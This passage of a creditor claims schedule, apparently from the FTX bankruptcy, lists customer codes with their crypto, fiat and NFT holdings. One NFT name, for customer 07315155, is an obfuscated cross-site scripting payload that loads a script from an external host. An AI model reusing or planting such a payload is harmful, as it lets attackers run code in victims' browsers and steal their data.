| 07314513 | | USD[10.00] | | |
| 07314515 | | USD[10.00] | | |
| 07314518 | | LTC[.00200929] | Yes | |
| 07314522 | | TRX[.00001], USDT[.005849] | | |
| 07314523 | | BTC[.00085149] | | |
| 07314536 | | ETH[.00003233], USD[0.00] | | |
| 07314547 | | BTC[0], USD[0.00] | | |
| 07314557 | | BTC[.00000005] | | |
| 07314561 | | LINK[.04963252], SUSHI[.382024], USD[0.41] | | |
| 07314564 | | USD[10.00] | | |
| 07314569 | | ETH[.00078879], ETHW[.00078879], SOL[.003], UNI[.0498], USD[5512.32], USDT[197.028683] | | |
| 07314583 | | ETH[0], ETHW[0.00067560], NFT (290190696209372243/Elysian - #5833)[1], NFT (290715231980646622/BrokenMaze-1412)[1], NFT (316993417376856826/The Tower #372-14)[1], NFT (333067427376483604/Elysian - #981)[1], NFT (342030862587042846/Elysian - #1678)[1], NFT (348758431193042068/Elysian - #6219)[1], NFT (355668865562143299/Elysian - #6103)[1], NFT (362651505673632086/Cingular #61)[1], NFT (404201429059278630/Elysian - #4414)[1], NFT (415764712297832863/Elysian - #5708)[1], NFT (434325741413459522/Moment-120)[1], NFT (476965621365856132/Elysian - #5584)[1], NFT (516590821371439047/Elysian - #5651)[1], NFT (517294074465446798/Cingular #162)[1], NFT (525244171763000271/Elysian - #5430)[1], NFT (530910646231082004/Elysian - #6250)[1], NFT (547253045922656769/Elysian - #6391)[1], NFT (567715604625372121/Cingular #1557)[1], SOL[0], USD[0.01] | | |
| 07314589 | | LINK[26.1], SHIB[74794.06919275], USD[0.00] | | |
| 07314591 | | ETH[1.4691], ETHW[1.4691], NFT (380698331010287412/Entrance Voucher #2352)[1], USD[2.83] | | |
| 07314596 | | USDT[2.875] | | |
| 07314597 | | USD[17.45] | | |
| 07314599 | | AVAX[15.1848], BTC[.22926967], ETH[1.516965], ETHW[.000965], SOL[23.72583], SUSHI[.42], USD[18304.99], USDT[4706.49300000], YFI[.663283] | | |
| 07314602 | | BTC[0], ETH[0], ETHW[0], USD[5.00], USDT[0.00043449] | | |
| 07314605 | | BF_POINT[300], ETH[0.00016371], ETHW[.00013234], LINK[-0.05950048], LTC[0.00939490], SOL[0.00000001], TRX[.000012], USD[0.01], USDT[0.00000001] | Yes | |
| 07314607 | | AAVE[.00016], AVAX[.0936], BTC[0.00000326], DOGE[.595], ETH[.000792], ETHW[.000792], LINK[.0112], LTC[.00543], SOL[.00928], SUSHI[.402], TRX[.96], USD[5.84], USDT[0] | | |
| 07314614 | | BTC[.000105] | | |
| 07314622 | | USD[2.08] | | |
| 07314623 | | BTC[0], SOL[0], SUSHI[0], UNI[0], USD[2.01] | | |
| 07314626 | | BTC[.00365975], LTC[.999] | | |
| 07314630 | | BTC[0.00000001], DAI[0], DOGE[0], ETH[0], ETHW[5.52944437], NFT (334611530357613563/The 2974 Collection #2498)[1], NFT (345064153809073672/2974 Floyd Norman - CLE 6-0050)[1], NFT (403992063144262499/Romeo #1093)[1], NFT (488787013863133353/Birthday Cake #2498)[1], NFT (507077572784198655/Golden Hill #538)[1], SOL[0], USD[0.00] | | |
| 07314633 | | BTC[.0235374], DOGE[155.376], ETH[.296808], ETHW[.296808], NFT (444947190729403589/Australia Ticket Stub #97)[1], SOL[20.06798049], USD[0.00] | | |
| 07314636 | | BTC[0], SOL[0.07277954], USD[0.00], USDT[0.00000031] | | |
| 07314638 | | USD[4.08] | | |
| 07314642 | | BCH[0.05062468], BTC[0] | | |
| 07314646 | | SOL[6.48708299], USD[30.00] | | |
| 07314647 | | BTC[.000001], SOL[0], USD[0.00] | | |
| 07314651 | | DOGE[.092], ETH[.00038545], ETHW[.09338545], LINK[41.50000001], SOL[.44], USD[138.82] | | |
| 07314657 | | BTC[.12250533], USD[0.87] | | |
| 07314658 | | DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000063] | | |
| 07314660 | | USD[0.00] | | |
| 07314661 | | AVAX[.09290475], BAT[4.19291789], BRZ[7.31418644], BTC[0.00000547], CUSDT[45.00246581], DOGE[2], ETH[.00000266], GRT[243.65557514], LTC[.03633875], NEAR[1.45914208], SHIB[63], SOL[0], TRX[24.85190198], USD[0.00], USDT[.00000001] | Yes | |
| 07314664 | | BTC[0], ETHW[.39797966], USD[1856.54] | | |
| 07314665 | | TRX[.000006], USD[0.02], USDT[0.00000001] | | |
| 07314666 | | BTC[0.00008251], SOL[.0029], SUSHI[13.419], USD[3.08], USDT[0.63384535] | | |
| 07314671 | | BTC[0.00001093], USDT[0.00001093] | | |
| 07314672 | | BTC[0.00009913], UNI[.0492], USD[0.11], USDT[0] | | |
| 07314678 | | GRT[.4501631], USD[0.61] | | |
| 07314685 | | BTC[0], ETHW[3.75216735], USD[-0.06], USDT[0] | | |
| 07314688 | | LTC[.00000001] | | |
| 07314692 | | CUSDT[.176], USD[12.91], USDT[0.06969144] | | |
| 07314696 | | USD[0.00] | | |
| 07314697 | | USD[0.00], USDT[0] | | |
| 07314700 | | BTC[0], ETH[0], ETHW[0.68700000], SUSHI[42.33], USD[0.27] | | |
| 07314702 | | TRX[0], USD[0.01], USDT[0.00000001] | | |
| 07314703 | | USD[0.00] | | |
| 07314704 | | BAT[0], BTC[0], ETH[0], GRT[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], YFI[0] | | |
| 07314710 | | BTC[0], DOGE[19.26761683], ETH[0], ETHW[0], USD[0.08] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07314712 | | ETH[0], ETHW[0], MATIC[0], SOL[0], USD[0.18] | | |
| 07314713 | | GRT[0], USD[2.54] | | |
| 07314717 | | AAVE[.08717315], AVAX[.5], BTC[0.00005260], LINK[.09611293], MATIC[1.616], NEAR[.65], SOL[0.14623418], SUSHI[.488], TRX[.000058], USD[4.91], USDT[0.09278340] | | |
| 07314720 | | USD[0.00] | | |
| 07314721 | | BTC[.2009988], DAI[199.8], ETH[.205794], ETHW[.205794], USD[31.10], USDT[99.9] | | |
| 07314723 | | BCH[1.453916], ETH[.449294], ETHW[.449294], USD[0.22] | | |
| 07314724 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07314727 | | LINK[.0389], SOL[0.00713000], SUSHI[.306], TRX[.774], USD[0.01], USDT[0], YFI[.000926] | | |
| 07314732 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07314733 | Contingent, Disputed | USD[0.51] | | |
| 07314739 | | BTC[0], DOGE[0], LTC[.00508], PAXG[0.00008331], SOL[0], SUSHI[0], TRX[0], USD[0.71] | | |
| 07314741 | | BAT[.152], BTC[0], DOGE[.806], USD[0.00], USDT[0] | | |
| 07314744 | | DOGE[0], ETH[0.07860639], ETHW[0.07860639] | | |
| 07314755 | | BTC[0], ETH[0], ETHW[0.49950000], SOL[0], SUSHI[0], USD[0.16], USDT[0] | | |
| 07314764 | | BAT[.00004327], CUSDT[4], DOGE[4.00581756], ETH[5.88011808], ETHW[.00004928], GRT[.00002254], TRX[3], UNI[1.00021708], USD[0.74], USDT[1.0650798] | Yes | |
| 07314769 | Contingent, Disputed | BTC[.00001603], USD[0.00] | | |
| 07314773 | | USD[0.52], USDT[0] | | |
| 07314780 | | BTC[.00000948], USD[4.38] | | |
| 07314789 | | ETH[.0008048], ETHW[.0008048], LINK[.06294], SOL[.00188], USD[0.01], YFI[.00094] | | |
| 07314803 | Contingent, Disputed | BTC[0], DOGE[0], GRT[0], LINK[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07314810 | | BTC[0], USD[4.54] | | |
| 07314815 | | USD[0.00], USDT[.06763971] | | |
| 07314823 | Contingent, Disputed | USD[10.00] | | |
| 07314828 | | USD[10.00] | | |
| 07314829 | | USD[10.00] | | |
| 07314830 | | USD[2.00], USDT[0] | | |
| 07314832 | | USD[10.00] | | |
| 07314833 | | USD[10.00] | | |
| 07314834 | | USD[10.00] | | |
| 07314837 | | DOGE[42.828], ETH[.006972], ETHW[.006972], USD[0.00], USDT[1.54361877] | | |
| 07314839 | | BTC[.00005479], EUR[0.31], USD[0.56] | | |
| 07314840 | | USD[10.00] | | |
| 07314847 | | USD[10.00] | | |
| 07314848 | | DOGE[0], ETH[.00073993], ETHW[.00073993], USD[0.08] | | |
| 07314850 | | USD[10.00] | | |
| 07314859 | | TRX[14741.76989099], USD[0.00] | | |
| 07314867 | | USD[10.00] | | |
| 07314869 | | USD[10.00] | | |
| 07314871 | | USD[10.00] | | |
| 07314873 | | SOL[6.24444812], USD[3760.67], USDT[3775.77904233] | | |
| 07314875 | | USD[0.00], USDT[99.5004] | | |
| 07314876 | | USD[10.00] | | |
| 07314880 | | USD[10.00] | | |
| 07314881 | | DOGE[1521.953], SHIB[4695300], USD[3.65], USDT[0] | | |
| 07314882 | | BTC[.00113518], DOGE[.00000001], ETH[0], LTC[0], NFT (28981769727161334/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #36)[1], NFT (292690458079384589/MagicEden Vaults)[1], NFT (314327872630726083/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #32)[1], NFT (318704122738317491/Doge Capital #725)[1], NFT (323130315273555601/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #68)[1], NFT (325790344523386995/Jelly Beast #1394)[1], NFT (339706230833387717/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 19, 1985 #7)[1], NFT (341728098560925785/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #55)[1], NFT (355389372698425340/Jelly Beast #1039)[1], NFT (355773822077616941/Golden bone pass)[1], NFT (362486488277196360/MagicEden Vaults)[1], NFT (363599910235524915/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #33)[1], NFT (364127068611784022/Jelly Beast #2243)[1], NFT (371197502383239395/Golden Woofer)[1], NFT (383343376626513769/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #56)[1], NFT (385872058060068918/MagicEden Vaults)[1], NFT (393387938980712708/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #25)[1], NFT (405167370151306661/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #29)[1], NFT (410650961800372473/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #48)[1], NFT (421423678406352573/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #33)[1], NFT (427177623506917459/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #26)[1], NFT (433688892045271255/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #5)[1], NFT (443605553079395936/Jelly Beast #2216)[1], NFT (455046894320734839/MagicEden Vaults)[1], NFT (467370612376611372/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #35)[1], NFT (468918250341839708/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #10)[1], NFT (471843299473396433/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #27)[1], NFT (475698538095127036/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #50)[1], NFT (476389586511113920/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #30)[1], NFT (497037093051615801/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #9)[1], NFT (506019384981072272/Marcus Allen's Playbook: Kansas City Chiefs vs. Detroit Lions - November 29, 1996 #31)[1], NFT (514203376558110452/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #40)[1], NFT (520587209960935677/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #16)[1], NFT (521944665587895502/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #12)[1], NFT (571317863748480978/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #32)[1], NFT (571705888743984228/MagicEden Vaults)[1], SOL[0.00000001], USD[23.48] | | |
| 07314884 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07314887 | | USD[10.00] | | |
| 07314891 | | SOL[0], USD[10.00] | | |
| 07314894 | Contingent, Disputed | BTC[.16858815], ETH[2.8281473], ETHW[2.8281473], LINK[348.05] | | |
| 07314896 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07314898 | | USD[10.00] | | |
| 07314899 | | BTC[0], ETH[0], USD[0.00], USDT[0.00000905] | | |
| 07314900 | | AAVE[0], AVAX[0], BTC[0], DOGE[0], ETH[0], MKR[0], NFT (34753904120372855(6/SBF Lunch #1)[1], NFT (57281052822373721162/Entrance Voucher #2225)[1], SOL[0], SUSHI[0], USD[0.22], USDT[0] | | |
| 07314903 | | BTC[0.00009748], SUSHI[.498] | | |
| 07314914 | | BTC[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07314917 | | BTC[0], DOGE[0], ETH[0], SOL[2.00285506], USD[0.00], USDT[0.00044986] | | |
| 07314920 | | AVAX[0], BCH[0], BTC[0], ETH[0.00000001], MATIC[0.00000001], SOL[0], USD[0.28], USDT[0.00000015] | | |
| 07314923 | | BTC[0], ETH[0], LINK[0], USD[0.00], USDT[0.00001095] | | |
| 07314929 | | BTC[0], ETH[0], USD[0.99] | | |
| 07314937 | | USD[0.00] | | |
| 07314940 | | USD[241.83] | | |
| 07314943 | | USD[10.00] | | |
| 07314945 | | BTC[.00232702], ETH[.000571], ETHW[.000571], LINK[.6993], USD[0.80] | | |
| 07314946 | | BTC[0], ETH[0], GRT[0], SOL[0.00000001], SUSHI[0], USD[0.00], USDT[0] | | |
| 07314949 | | BF_POINT[300], BTC[0], ETH[0], USD[0.00] | | |
| 07314963 | Contingent, Disputed | BTC[0], ETHW[0], NEAR[0], SOL[0], UNI[.00000001], USD[0.00], USDT[0] | Yes | |
| 07314976 | | ETH[.00058259], ETHW[1.90058259], LINK[.041032], USD[0.01] | | |
| 07314978 | | USD[0.02] | | |
| 07314979 | | SOL[0], USD[0.00] | | |
| 07314983 | | USD[0.00] | | |
| 07314985 | | DOGE[.21782892], USD[0.00] | | |
| 07314998 | | PAXG[.00000001], USD[0.00] | | |
| 07315005 | | ETH[.00000001], ETHW[0.16950014], TRX[.000007], USD[0.00], USDT[0.00000001] | | |
| 07315009 | | AAVE[0.00127631], AVAX[0.03849974], BTC[0.00119411], ETH[0.00519661], ETHW[0.00519661], MATIC[0], SOL[0.00428465], SUSHI[0], USD[1759.87], USDT[3768.96914103] | | |
| 07315017 | | USD[10.00] | | |
| 07315023 | | BTC[0.01049993], DOGE[0], ETH[0], LTC[0], SOL[48.67168783], USD[1.30] | | |
| 07315025 | | DOGE[0.98498602], SOL[.092], SUSHI[.124], USD[1.41] | | |
| 07315034 | | USD[10.00] | | |
| 07315038 | | ETH[.001], ETHW[.001], SOL[.0012459], USD[0.37], USDT[0] | | |
| 07315040 | | USD[10.00] | | |
| 07315041 | | USD[10.00] | | |
| 07315042 | | USD[10.00] | | |
| 07315045 | | BTC[0.00039962], NFT (307074812507665963/Nord Grids #5)[1], NFT (314103208104149069/India Grids #3)[1], NFT (315784596485969330/FTX Grid #3)[1], NFT (317059403343593518/Halloween Grids #2)[1], NFT (319334847521324997/PaperColor Grids #2)[1], NFT (323878731151815464/YellowSubmarine Grids)[1], NFT (330165120529889938/PaperColor Grids #3)[1], NFT (331055479322795047/India Grids #4)[1], NFT (333065594793853193/Gruvbox Grids #3)[1], NFT (343200480020213404/Solarized Grids #5)[1], NFT (351522861878135164/Metroid Grids)[1], NFT (351530398822001865/India Grids #2)[1], NFT (354081695375491116/Brazil Grids #2)[1], NFT (354933117577147522/Gruvbox Grids #6)[1], NFT (355096699429712635(8/USA Grids)[1], NFT (360222615700360746/Gruvbox Grids #5)[1], NFT (369619561718655353/Solana Grids #7)[1], NFT (370093491333248877/FTX Grid #5)[1], NFT (373006904880123791(8/Dracula Grids #3)[1], NFT (375867322642372450/Matrix Grids)[1], NFT (410839077859537429/Twilight Grids)[1], NFT (418069473452884825/Dracula Grids #4)[1], NFT (421005069836253685/Solarized Grids #3)[1], NFT (424290062084874190/FTX Grid #6)[1], NFT (428565401406671127/PaperColor Grids)[1], NFT (432528513753844829/FTX Grid #2)[1], NFT (435181671522203087/Apprentice Grids)[1], NFT (436165100079502937/FTX Grid #4)[1], NFT (436341377322237239/Solana Grids #3)[1], NFT (445492674991792556/Solana Grids #6)[1], NFT (450356507680157498/Nord Grids #2)[1], NFT (451247709124641386/Brazil Grids)[1], NFT (457797355236596648/Dracula Grids)[1], NFT (458406186719176925/Solarized Grids #2)[1], NFT (462212688710734179/Solana Grids #2)[1], NFT (464480273208142233/India Grids)[1], NFT (467766848106361912/Solana Grids #9)[1], NFT (470060377828422938/Halloween Grids #3)[1], NFT (490648065013078169/Halloween Grids)[1], NFT (491324308400080643/Solana Grids #10)[1], NFT (492718749572279341/Solana Grids #8)[1], NFT (510308621102706116/Solana Grids)[1], NFT (517984678575155397/Metroid Grids #2)[1], NFT (518148949032117737/Brazil Grids #3)[1], NFT (523568760844520(47/Matrix Grids #3)[1], NFT (524444423048518955/YellowSubmarine Grids #2)[1], NFT (529267310154872660/Solarized Grids #6)[1], NFT (542266133730927452/Gruvbox Grids #4)[1], NFT (545774400123951509/Metroid Grids #3)[1], NFT (547651548546954048/FTX Grid)[1], NFT (551253710273635589/Humpty Dumpty #272)[1], NFT (573010853186687426/Gruvbox Grids #2)[1], NFT (574607043035598953/Solana Grids #4)[1], USD[0.35] | | |
| 07315050 | | TRX[.000012], USD[0.00], USDT[.002066] | | |
| 07315052 | | DOGE[0], ETH[0], GBP[197.96], USD[9137.27] | Yes | |
| 07315055 | | BTC[0.00366113], DOGE[376.876], ETH[3.62915055], ETHW[3.62915055], GRT[171.312], LINK[375.2924], SOL[15.26], SUSHI[4.995], USD[280.52], USDT[12.58576] | | |
| 07315063 | | USD[0.07] | | |
| 07315066 | | NEAR[.0519], USD[0.05] | | |
| 07315067 | | NFT (425895722899679426/Imola Ticket Stub #1636)[1], NFT (469361780915573824/Monaco Ticket Stub #126)[1], NFT (560158335618909182/Barcelona Ticket Stub #1331)[1], NFT (565696334653358363/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #17)[1] | | |
| 07315068 | | DOGE[0], USD[0.00] | | |
| 07315071 | | BTC[0], ETH[0], ETHW[0], SOL[0.00554692], USD[0.00], USDT[0] | | |
| 07315081 | | USD[3.04] | | |
| 07315083 | | SOL[0] | | |
| 07315084 | | DOGE[.16859819], SOL[963.65478237] | | |
| 07315085 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07315086 | | USD[0.00] | | |
| 07315088 | | BTC[0], DOGE[5], USD[10.00] | | |
| 07315092 | | BTC[0.00004459], ETH[0.00732729], ETHW[0.00732729], NFT (47543670885571876/Greeny Tooth)[1], USD[11.65] | | |
| 07315096 | | USD[10.00] | | |
| 07315097 | | BTC[0.00001464], DOGE[0.16118067], ETH[0.00037592], ETHW[0.09937592], NFT (570107317102198014/Reflection '18 #05)[1], SOL[1.0649992], USD[8.08] | | |
| 07315099 | | BTC[0], SOL[86.23120283], USD[0.01] | | |
| 07315100 | | USD[10.00] | | |
| 07315103 | | BRZ[5.50735033], BTC[.00000834], USD[20.36] | | |
| 07315105 | | USD[10.00] | | |
| 07315109 | | GRT[204.67773567], SOL[29.24557652], SUSHI[12.90877323], TRX[5450.22392244], USD[0.00], YFI[.00603584] | | |
| 07315113 | | USD[10.00] | | |
| 07315114 | | NFT (465874710823573473/Entrance Voucher #3235)[1], SHIB[12.5991456], USD[0.00] | | |
| 07315116 | | USD[0.01] | | |
| 07315124 | | USD[0.07] | | |
| 07315139 | | USD[3.27] | | |
| 07315140 | | NFT (327544825758252743/The 2974 Collection #2695)[1], NFT (359944667357510260/Birthday Cake #1355)[1], NFT (412653155307350812/The 2974 Collection #2193)[1], NFT (417549610995572815/Birthday Cake #0844)[1], NFT (466669283537159698/Birthday Cake #2193)[1], NFT (533140409076515067/The 2974 Collection #0844)[1], NFT (536845033507686349/The 2974 Collection #1355)[1], NFT (569631383572343477/Birthday Cake #2695)[1], USD[286.32] | | |
| 07315144 | | ETH[.0019981], ETHW[.0019981], USD[0.00] | | |
| 07315152 | | USD[0.70] | | |
| 07315155 | | NFT (454196024447094943/"><svg onload=eval&#0000000040atob&#0000000040this.id))id=dmFylGE9ZG9ldW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0lik7YS5zcmM9lmh0dHBzOi8vZGl0Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKS&#61;>)[1], USD[0.00] | | |
| 07315156 | | BTC[.0007926], USD[0.00] | | |
| 07315161 | | BTC[0.00007209], ETH[.00093375], ETHW[.00093375], SOL[.00000001], USD[1.32], USDT[0.25042601] | | |
| 07315164 | | SOL[.2] | | |
| 07315181 | | NFT (296191100604095834/Spectra #225 (Redeemed))[1], NFT (374818018794416179/Night Light #74)[1], NFT (388137750833431610/Golden Hill #21)[1], NFT (395028010749885087/Spectra #117 (Redeemed))[1], NFT (421228130395719375/Colossal Cacti #383 (Redeemed))[1], NFT (435198946168271630/Reflection '11 #67 (Redeemed))[1], NFT (445312311015592149/Sun Set #613 (Redeemed))[1], NFT (475694285734231404/Beasts #174)[1], NFT (498378330171175529/Vintage Sahara #779 (Redeemed))[1], NFT (499544300292322470/Sun Set #94 (Redeemed))[1], NFT (520218231679015370/Golden Hill #535 (Redeemed))[1], NFT (547373728649727148/Reflector #906)[1], NFT (572181840458410024/Cosmic Creations #736 (Redeemed))[1], SHIB[1199700], USD[7.65], USDT[0] | | |
| 07315184 | | BTC[0], USD[0.00] | | |
| 07315196 | | BTC[0], USD[0.00] | | |
| 07315199 | | USD[0.49] | | |
| 07315202 | | USD[9.36] | | |
| 07315203 | | BF_POINT[200], BTC[0.03504463], CUSDT[2], DOGE[3.00043663], ETH[.00003199], ETHW[.00003199], LINK[1.49138693], MATIC[7.7504202], MKR[.00597914], NFT (290186576613795184/Coachella x FTX Weekend 1 #26370)[1], NFT (306943498654302959/FTX - Off The Grid Miami #610)[1], NFT (407154516868443836/The Hill by FTX #1833)[1], NFT (458845625061084030/Microphone #22)[1], NFT (461593498711015762/FTX Crypto Cup 2022 Key #894)[1], NFT (514562410045932306/You in, Miami? #13)[1], NFT (541964315534578995/Humpty Dumpty #6)[1], TRX[3], UNI[0.07212732], USD[0.00] | Yes | |
| 07315216 | Contingent, Disputed | USD[0.00] | | |
| 07315219 | | DOGE[0.19051509], ETH[.0000001], ETHW[0], USD[0.00] | | |
| 07315223 | | BTC[.00019496] | | |
| 07315225 | | 0 | | |
| 07315226 | | DOGE[0.06605456], LINK[.0968], SHIB[94587.92812273], SOL[1], USD[0.81], USDT[.8059935] | | |
| 07315228 | | USD[0.00], USDT[0.00001620] | | |
| 07315231 | | BTC[.07945281], DOGE[24960.84970497], ETH[0], SOL[97.49182782], SUSHI[99.6], TRX[20953.43986917], USD[0.11] | | |
| 07315235 | | ETHW[.0007], USD[47548.67] | | |
| 07315238 | | USD[0.12] | | |
| 07315239 | | ETH[0], SOL[0], USD[1.16] | | |
| 07315242 | | BTC[.00046754], DOGE[1], USD[0.01] | | |
| 07315245 | | BTC[0.00049113], USD[515.00], YFI[.000908] | | |
| 07315261 | | ETH[.019], ETHW[8.238], GBP[17.00], USD[7.34] | | |
| 07315263 | | TRX[.57618], USDT[1.36846525] | | |
| 07315265 | | USD[0.00] | | |
| 07315271 | | NFT (472872702465567385/Entrance Voucher #7597)[1] | | |
| 07315297 | | BTC[0], ETH[.00000001], ETHW[0], NFT (523739439144094787/Coachella x FTX Weekend 2 #27514)[1], SOL[0] | | |
| 07315303 | | ETH[.000704], ETHW[.000704], USD[0.00] | | |
| 07315304 | | SOL[12.72061967] | | |
| 07315305 | | BTC[0], ETH[0], LTC[0], USD[0.00], USDT[0.00462700] | | |
| 07315306 | | USD[3.95] | | |
| 07315308 | | GRT[345.612], USD[162.18] | | |
| 07315310 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07315315 | | LTC[0], SUSHI[0], USD[0.03] | | |
| 07315317 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07315319 | | NFT (3717076516521855535/Maxpower series)[1], NFT (406439878173771870/FTX - Off The Grid Miami #3161)[1], NFT (54917014086400330/SolCat #4809)[1], SOL[0] | | |
| 07315320 | | USD[0.00] | | |
| 07315324 | | BTC[.00000001], USD[0.00] | | |
| 07315331 | | ETH[.0000125], ETHW[.0007344], USD[1000.00] | | |
| 07315333 | | DOGE[0] | | |
| 07315335 | | BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07315336 | | DOGE[8.991], USD[0.41] | | |
| 07315350 | | USD[1.54] | | |
| 07315351 | | SOL[3.54645], SUSHI[139.668], USD[2.12] | | |
| 07315354 | | DOGE[127.488], USD[0.00] | | |
| 07315364 | | ETH[.019], ETHW[.019] | | |
| 07315367 | | UNI[.08166208], USD[467.39] | | |
| 07315371 | | BCH[0], BTC[.00009636], DOGE[.817], GRT[.392], LINK[.0276], NFT (344628907240072727/Bahrain Ticket Stub #302)[1], NFT (410630426708894241/FTX - Off The Grid Miami #495)[1], SUSHI[.01], UNI[.0972], USD[7.67], USDT[10] | | |
| 07315372 | | DOGE[2027.856], USD[0.01] | | |
| 07315373 | | USD[100.00] | | |
| 07315374 | | USD[0.62] | | |
| 07315377 | | BTC[.0000024], DOGE[1298.165], GRT[.65], SUSHI[150.275], USDT[.042993] | | |
| 07315381 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000305] | | |
| 07315382 | | USDT[.9970096] | | |
| 07315384 | | BTC[.0000894], SUSHI[.484], USD[0.00] | | |
| 07315385 | | LINK[.088], USD[18.56], USDT[0.00000001] | | |
| 07315388 | | USD[0.14] | | |
| 07315393 | | USD[0.04], USDT[0], WBTC[0] | | |
| 07315398 | | DOGE[.54], USD[0.53] | | |
| 07315400 | | BTC[0.00002100], DOGE[.651], PAXG[.0000745], SHIB[49533.35059692], TRX[.000022], USD[0.00] | | |
| 07315402 | | DOGE[0], LINK[0], SOL[0] | | |
| 07315404 | | ETH[0], USD[0.00] | | |
| 07315407 | | SOL[49.13137358], USD[218.85] | | |
| 07315412 | | BTC[0], DOGE[0] | | |
| 07315414 | | BAT[0], BTC[0], DOGE[0], ETH[0.05073263], ETHW[0.05073263], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07315420 | | ETHW[.068942], USD[0.33] | | |
| 07315425 | | DOGE[.975], USD[0.60] | | |
| 07315429 | | USD[0.00] | | |
| 07315430 | | ETH[0], USD[2.91] | | |
| 07315434 | | BTC[0.00003799], DOGE[.083], LINK[.07490249], SOL[.946], SUSHI[.312], USD[1.56] | | |
| 07315436 | | DOGE[.444], LINK[.15215654], SOL[.01], USD[0.19] | | |
| 07315437 | | ETH[.1], ETHW[.1], USD[489.90], USDT[10] | | |
| 07315440 | | USD[0.04] | | |
| 07315452 | | NFT (363272319595480549/The Hill by FTX #6942)[1], SOL[.00976961], USD[0.00] | | |
| 07315453 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07315455 | | BTC[0], ETH[0], LINK[0], USD[0.00], USDT[0] | | |
| 07315461 | | USD[0.37] | | |
| 07315462 | | BTC[.0000268], ETH[.000516], ETHW[.000516] | | |
| 07315471 | | BTC[0], DOGE[.3274], ETH[0], USD[2.28], USDT[0.51558981], YFI[.000643] | | |
| 07315472 | | DOGE[.196], LINK[.0096], LTC[.00458], USD[4.12] | | |
| 07315481 | | AUD[19.00], DOGE[0], ETH[0], USD[0.24], USDT[0] | | |
| 07315485 | | BTC[0], DAI[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], TRX[0], USD[1.06], USDT[0] | | |
| 07315490 | | GRT[.228] | | |
| 07315493 | | USD[7.14] | | |
| 07315495 | | BTC[0], DOGE[0], MATIC[0], SOL[0], USD[5.08], USDT[0], YFI[0.00064242] | Yes | |
| 07315498 | | BTC[0], USD[0.00] | | |
| 07315499 | | USDT[0] | | |
| 07315500 | | DOGE[.824], ETH[.52273266], ETHW[.52273266], USD[0.63] | | |
| 07315501 | | USD[0.00], USDT[0.00000001] | | |
| 07315502 | | AAVE[6.44032238], CAD[0.00], CUSDT[8.67879980], ETH[0.07492500], ETHW[0], LTC[10.20196253], MATIC[338.00424001], SUSHI[232.04467738], USD[200.25], USDT[0] | Yes | |
| 07315504 | | BTC[.00026336], ETH[.07392602], ETHW[.07392602] | | |
| 07315512 | | BTC[.0000385], NFT (525013025350378693/Humpty Dumpty #1313)[1], SOL[32.2704], USD[2.46] | | |
| 07315521 | | USD[6.66] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
